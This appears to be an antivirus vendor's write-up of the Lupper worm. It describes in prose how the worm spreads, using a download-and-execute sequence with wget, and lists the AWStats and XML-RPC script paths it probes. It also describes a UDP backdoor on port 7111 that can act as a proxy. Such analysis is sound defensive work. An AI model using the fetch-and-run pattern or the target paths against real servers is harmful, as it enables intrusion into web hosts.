Method of Distribution
Via Exploits
Lupper attempts to execute a simple set of four commands on a remote server:
- Change folder to /tmp
- Download a copy of the worm named “lupii” from a particular hard-coded IP address using Wget
- Modify its execution attributes
- Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats script at the following locations:
/cgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/stats/awstats.pl
/stats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
Back to top
Payload
Backdoor Functionality
Lupper.A opens a UDP backdoor on port 7111 that allows a remote controller unauthorized access to the affected machine.
The worm can also relay Internet traffic – i.e. act a s a proxy.
Back to top
For additional information:
The worm reports back to its hosting site, sending data through UDP port 7111.
Analysis by Jakub Kaminski
Back to top